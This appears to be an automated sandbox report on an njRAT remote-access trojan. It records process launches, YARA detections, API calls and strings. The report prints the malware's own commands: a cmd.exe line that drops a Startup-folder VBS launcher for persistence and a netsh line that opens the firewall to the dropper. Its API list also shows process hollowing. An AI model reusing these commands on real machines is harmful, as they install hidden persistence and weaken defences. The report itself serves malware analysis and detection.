Commandline:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	06:52:01
Start date:	08/02/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Imagebase:	0x800000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:52:01
Start date:	08/02/2024
Path:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: njrat1, Description: Identify njRat, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:52:01
Start date:	08/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:52:01
Start date:	08/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:52:02
Start date:	08/02/2024
Path:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:52:09
Start date:	08/02/2024
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
Imagebase:	0x1560000
File size:	82'432 bytes
MD5 hash:	4E89A1A088BE715D6C946E55AB07C7DF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:52:09
Start date:	08/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:52:20
Start date:	08/02/2024
Path:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: njrat1, Description: Identify njRat, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	06:52:21
Start date:	08/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 6568, Parent PID: 5852

General

Target ID:	20
Start time:	06:52:21
Start date:	08/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:52:22
Start date:	08/02/2024
Path:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\WindowsServices.exe
Imagebase:	0x400000
File size:	348'002 bytes
MD5 hash:	ACB30A04DA7096C99877B47F3050190D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: njrat1, Description: Identify njRat, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	28.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.8%
Total number of Nodes:	1180
Total number of Limit Nodes:	13

Executed Functions

Function 00405A10 Relevance: 1652.4, APIs: 101, Strings: 841, Instructions: 3880libraryfilethreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0000006B,?), ref: 004074E7
GetProcAddress.KERNEL32(00000000), ref: 004074EA
LoadLibraryA.KERNEL32(0000006B,?), ref: 004074FD
GetProcAddress.KERNEL32(00000000), ref: 00407500
LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407563
LoadLibraryA.KERNELBASE(00000073,StcF), ref: 0040764D
LoadLibraryA.KERNEL32(00000073,StcF), ref: 00407666
LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040767C
LoadLibraryA.KERNEL32(advapi,00000052), ref: 0040768F
LoadLibraryA.KERNEL32(advapi,RuV), ref: 0040769F
LoadLibraryA.KERNEL32(advapi,RuV), ref: 004076B5
LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076C5
LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076D5
LoadLibraryA.KERNEL32(advapi,00000052), ref: 004076E5
LoadLibraryA.KERNEL32(0000006B,?), ref: 004077AC
LoadLibraryA.KERNEL32(0000006B,?), ref: 004077BC
LoadLibraryA.KERNEL32(advapi,0000004F), ref: 004077CC
LoadLibraryA.KERNEL32(advapi,?), ref: 004077E2
LoadLibraryA.KERNEL32(advapi,Allocat), ref: 004077F8
LoadLibraryA.KERNEL32(advapi,EqualSid), ref: 0040780E
LoadLibraryA.KERNEL32(advapi,LookupAccountSidA), ref: 00407824
LoadLibraryA.KERNEL32(0000006B,Clos), ref: 0040783A
LoadLibraryA.KERNEL32(0000006B,?), ref: 0040784A
LoadLibraryA.KERNEL32(0000006B,?), ref: 00407860
LoadLibraryA.KERNEL32(0000006B,Clos), ref: 00407876
LoadLibraryA.KERNELBASE(psapi.dll,?), ref: 00407A43
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00407AFB
wcscpy.MSVCRT ref: 00407B17
wcscpy.MSVCRT ref: 00407F50
wcscat.MSVCRT ref: 00407F7A
wcscpy.MSVCRT ref: 00407F8A
wcscat.MSVCRT ref: 00407F9E
wcscat.MSVCRT ref: 00408144
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040817F
Wow64GetThreadContext.KERNEL32 ref: 004081A2
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 004081BE
NtUnmapViewOfSection.NTDLL(?,?), ref: 004081CF
NtUnmapViewOfSection.NTDLL(?,?), ref: 004081E0
NtUnmapViewOfSection.NTDLL(?,?), ref: 004081FF
NtUnmapViewOfSection.NTDLL(?,?), ref: 0040820D
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 00408288
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004082BF
VirtualAllocEx.KERNELBASE(?,-FFF00000,00100000,00003000,00000040,?,00003000,00000040), ref: 004082EE
WriteProcessMemory.KERNEL32(?,00000000,.dll,00000190,00000000,?,00003000,00000040), ref: 00408306
WriteProcessMemory.KERNELBASE(?,00000000,.dll,?,00000000,?,00003000,00000040), ref: 00408317
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?,00003000,00000040), ref: 00408353
WriteProcessMemory.KERNELBASE(?,0000002E,0000006B,?,00000000,?,00003000,00000040), ref: 004083C0
WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,?,?,00003000,00000040), ref: 004083F5
Wow64SetThreadContext.KERNEL32(?,00010007,?,00003000,00000040), ref: 0040841A
WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 00408480
ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 00408486
Wow64SuspendThread.KERNEL32(?,?,00003000,00000040), ref: 00408490
WriteProcessMemory.KERNELBASE(?,00000050,?,00000004,00000000,?,00003000,00000040), ref: 004084B5
wcscpy.MSVCRT ref: 00408760
wcscat.MSVCRT ref: 00408774
MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040878D
CopyFileW.KERNELBASE(?,?,00000000), ref: 004087A3
ResumeThread.KERNELBASE(?), ref: 004087FC
Sleep.KERNELBASE(00000002), ref: 00408815
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00408837
Module32First.KERNEL32(00000000,00000000), ref: 004088AC
strstr.MSVCRT ref: 004088D6
Wow64SuspendThread.KERNEL32(?), ref: 00408904
Wow64SuspendThread.KERNEL32(?), ref: 0040891F
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408926
DeleteFileW.KERNELBASE(?), ref: 00408930
ResumeThread.KERNELBASE(?), ref: 00408949
Sleep.KERNELBASE(00000002), ref: 0040894D
DeleteFileW.KERNELBASE(?), ref: 00408956
Wow64SuspendThread.KERNEL32(?), ref: 0040897B
Sleep.KERNELBASE(00000005), ref: 0040898A
MoveFileExW.KERNELBASE(?,?,00000008), ref: 0040899C
ResumeThread.KERNELBASE(?,?,00003000,00000040), ref: 004089B3
wcscat.MSVCRT ref: 00408A5B
wcsstr.MSVCRT ref: 00408A82
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408AA2
TerminateProcess.KERNELBASE(00000000), ref: 00408AD9
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000002,00000000,00000000), ref: 00408C6D
CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000003,00000000,00000000), ref: 00408C8E
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408CAF
CreateFileW.KERNELBASE(00000000,40000000,00000002,00000000,00000005,00000000,00000000), ref: 00408CD2
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408CE1
CreateToolhelp32Snapshot.KERNEL32 ref: 00408D72
Process32First.KERNEL32(00000000,00000128), ref: 00408DDC
strstr.MSVCRT ref: 00408E02
strstr.MSVCRT ref: 00408E16
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00408E2E
CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00408FB8
CreateFileA.KERNELBASE(00000000,00000000,00000002,00000000,00000003,00000000,00000000), ref: 00408FDA
CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409030
wcslen.MSVCRT ref: 00409045
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040906E
wcscat.MSVCRT ref: 004090E9
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409108
VirtualAlloc.KERNELBASE(00000000,-00000400,00003000,00000040), ref: 0040912D
ReadFile.KERNELBASE(?,.dll,00000000), ref: 00409151
FindCloseChangeNotification.KERNELBASE(000000FF), ref: 004091BD
VirtualAlloc.KERNELBASE(00000000,00000400,00003000,00000040), ref: 00409294
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 004099EB
Sleep.KERNELBASE(00000320), ref: 004099F6
TerminateProcess.KERNELBASE(?,00000000), ref: 004099FF

Strings

i, xrefs: 00407FBF
u, xrefs: 004095AD
r, xrefs: 004065FD
l, xrefs: 00405C2A
k, xrefs: 004061B1
u, xrefs: 004063E1
r, xrefs: 00406663
r, xrefs: 00405DB2
n, xrefs: 00408522
i, xrefs: 0040733C
l, xrefs: 0040969B
r, xrefs: 004067E7
/, xrefs: 00408643
l, xrefs: 00405CF4
j, xrefs: 0040961F
., xrefs: 0040992A
i, xrefs: 00406539
F, xrefs: 00406D79
.dll, xrefs: 00407AA6, 00409148, 0040927A, 0040933C, 00409368, 00409C3E, 00409C27, 00409C07, 00409B7F, 004091E6, 0040920B, 0040921B, 0040922B, 004091A6, 00409175, 00408B16, 00408B50, 00408B73, 00408BFD, 004082F0, 00408454, 00408303, 00408314, 00408B21, 00408B61, 00408B80, 00408C00, 0040914F, 00409178, 004091B0, 0040934C, 00409B82, 00409C0A, 00409C2A, 00409C41
p, xrefs: 00407DE6
2, xrefs: 00405B0D
o, xrefs: 0040686F
g, xrefs: 00406986
t, xrefs: 00406E48
, xrefs: 00409569
O, xrefs: 004068D1
t, xrefs: 004063E8
<, xrefs: 00408693
C, xrefs: 00405E11
s, xrefs: 00405EE5
o, xrefs: 00406FF9
l, xrefs: 004069AF
R, xrefs: 004096B7
c, xrefs: 004067A9
n, xrefs: 00406E41
Clos, xrefs: 00407558, 00407561
P, xrefs: 00406891
h, xrefs: 004068A6
r, xrefs: 00405D74
o, xrefs: 00406EE7
NtUnmapVi, xrefs: 00407916, 00407922
b, xrefs: 00406119
w, xrefs: 00409BAC
s, xrefs: 00405EDE
l, xrefs: 0040613C
n, xrefs: 004061FA
i, xrefs: 004074CC
a, xrefs: 00406898
t, xrefs: 00406BC7
s, xrefs: 004070BB
r, xrefs: 0040742E
t, xrefs: 004066DE
i, xrefs: 004062ED
E, xrefs: 00406A29
s, xrefs: 00405E99
h, xrefs: 00405EA0
W, xrefs: 00406B1F
M, xrefs: 004070C9
A, xrefs: 004069D1
r, xrefs: 00408EF0
a, xrefs: 00406AF6
O, xrefs: 0040692F
d, xrefs: 00405C23
t, xrefs: 00406B98
a, xrefs: 00406062
n, xrefs: 00407143
W, xrefs: 00406D94
2, xrefs: 00408089
i, xrefs: 0040665C
i, xrefs: 00406C86
R, xrefs: 00406B2D
f, xrefs: 004084E7
x, xrefs: 004069CA
m, xrefs: 00407373
Proc, xrefs: 004078AC, 004078B5
m, xrefs: 004071FB
>, xrefs: 00408564
A, xrefs: 0040680A
y, xrefs: 004070EB
R, xrefs: 00406979
P, xrefs: 004072D5
l, xrefs: 00405A3B
P, xrefs: 004060CE
c, xrefs: 004060E3
x, xrefs: 00408D67
n, xrefs: 00406293
r, xrefs: 004060D5
t, xrefs: 00405E2C
C, xrefs: 00406B41
., xrefs: 0040862E
t, xrefs: 00406FEB
s, xrefs: 00407D63
F, xrefs: 0040802C
h, xrefs: 00407113
o, xrefs: 004073C7
u, xrefs: 004066FA
., xrefs: 00409679
", xrefs: 004096D3
a, xrefs: 004067F5
., xrefs: 00408F04
h, xrefs: 00407187
i, xrefs: 00405FBF
D, xrefs: 00406BA5
>, xrefs: 0040868C
o, xrefs: 00406181
t, xrefs: 0040734A
r, xrefs: 00405BAF
2, xrefs: 00405EF2
t, xrefs: 00406641
VirtualAlloc, xrefs: 00407773, 0040777C
T, xrefs: 00407268
n, xrefs: 004071B7
2, xrefs: 00405AC8
o, xrefs: 004060DC
E, xrefs: 00406A9D
a, xrefs: 0040641E
t, xrefs: 00409672
\cmd., xrefs: 00409A9A
<, xrefs: 004084CC
_, xrefs: 00409054
c, xrefs: 0040684C
d, xrefs: 00405BA1
Shdt, xrefs: 00407975, 0040797E
l, xrefs: 00405B19
n, xrefs: 004062A8
x, xrefs: 00406964
h, xrefs: 00407B6F
s, xrefs: 00407449
E, xrefs: 00407DD8
2, xrefs: 004080E0
l, xrefs: 00407B7C
CopyFil, xrefs: 00407734, 0040773D
t, xrefs: 0040659D
p, xrefs: 00408685
x, xrefs: 00407F6A
s, xrefs: 0040670E
M, xrefs: 004063DA
2, xrefs: 00405E76
N, xrefs: 00405C9C
l, xrefs: 00406A89
c, xrefs: 00405DE8
d, xrefs: 00407261
n, xrefs: 00407BA5
c, xrefs: 00407FC8
z, xrefs: 004062D9
/, xrefs: 00408658
a, xrefs: 00405E25
l, xrefs: 00405AE4
n, xrefs: 00405A34
d, xrefs: 00409923
T, xrefs: 00407298
l, xrefs: 00405ABB
i, xrefs: 0040651E
o, xrefs: 0040737A
I, xrefs: 004062A1
c, xrefs: 00405D82
C, xrefs: 00406E2C
r, xrefs: 004072A5
p, xrefs: 00408586
", xrefs: 00408619
d, xrefs: 00405CE6
i, xrefs: 00406CD7
2, xrefs: 00405FB1
I, xrefs: 00406201
i, xrefs: 00405F00
a, xrefs: 00408544
l, xrefs: 00406AFD
r, xrefs: 0040958B
C, xrefs: 004073C0
t, xrefs: 00407FFA
t, xrefs: 00405C51
o, xrefs: 00405D7B
r, xrefs: 004066E5
n, xrefs: 00406ED2
=, xrefs: 00408612
i, xrefs: 004067B0
l, xrefs: 00409694
T, xrefs: 00405E39
T, xrefs: 0040710C
W, xrefs: 00406BE3
M, xrefs: 00406432
o, xrefs: 00405DE1
\, xrefs: 004090A1
s, xrefs: 00409BB0
s, xrefs: 00406EB0
C, xrefs: 004080F9
u, xrefs: 00407351
d, xrefs: 004071A2
u, xrefs: 00406A1C
a, xrefs: 004073DC
LookupAccountSidA, xrefs: 00407813, 0040781C
s, xrefs: 00406C36
p, xrefs: 00409B38
a, xrefs: 00406A82
y, xrefs: 00406604
w, xrefs: 00406FC2
R, xrefs: 0040691B
IsWow64Proc, xrefs: 004079FC, 00407A05
m, xrefs: 004073CE
r, xrefs: 004065DB
V, xrefs: 00406A07
f, xrefs: 00407FF1
t, xrefs: 00406701
S, xrefs: 004069F3
<, xrefs: 00408530
S, xrefs: 00409680
Proc, xrefs: 0040788F, 00407898
s, xrefs: 0040865F
o, xrefs: 004072E3
k, xrefs: 00408070
y, xrefs: 00406956
o, xrefs: 0040746B
s, xrefs: 00405F45
r, xrefs: 00407E3F
o, xrefs: 0040667E
Modul, xrefs: 004078D1, 004078DA
l, xrefs: 00406D87
v, xrefs: 00408D1F
o, xrefs: 00409584
a, xrefs: 00407BCF
u, xrefs: 00405CED
a, xrefs: 00407127
S, xrefs: 0040964F
t, xrefs: 004072C8
o, xrefs: 004061E6
a, xrefs: 00409BA4
s, xrefs: 004070C2
p, xrefs: 0040679C
m, xrefs: 00406CF9
t, xrefs: 00407B53
p, xrefs: 0040857F
E, xrefs: 00406B11
S, xrefs: 00406C44
Modul, xrefs: 004078C0, 004078C9
0, xrefs: 00408099
o, xrefs: 00405B8C
P, xrefs: 00407427
i, xrefs: 00406745
t, xrefs: 004071D2
u, xrefs: 004060A5
t, xrefs: 00405EAE
F, xrefs: 00406C7F
M, xrefs: 00405BE6
d, xrefs: 00406568
Rmr, xrefs: 00407986, 0040798F
s, xrefs: 00408572
n, xrefs: 0040616C
s, xrefs: 004060F7
A, xrefs: 00405D9D
, xrefs: 004096CC
Allocat, xrefs: 004077ED, 004077F6
., xrefs: 00408887
s, xrefs: 00405FCD
g, xrefs: 00406928
v, xrefs: 00409B62
m, xrefs: 004095B4
C, xrefs: 00407135
r, xrefs: 00406B84
s, xrefs: 00406F02
VBoxS, xrefs: 00408DFD, 00408E01
r, xrefs: 0040711A
A, xrefs: 004064A5
r, xrefs: 00405A30
r, xrefs: 00407276
u, xrefs: 004096BE
l, xrefs: 00408EE2
F, xrefs: 0040656F
S, xrefs: 00406795
T, xrefs: 00406CEB
r, xrefs: 00406BD5
n, xrefs: 00409562
d, xrefs: 0040732E
d, xrefs: 0040722A
F, xrefs: 004067C5
o, xrefs: 00407495
i, xrefs: 004084EE
i, xrefs: 004072B3
F, xrefs: 004064DB
x, xrefs: 004063F5
t, xrefs: 00409B2A
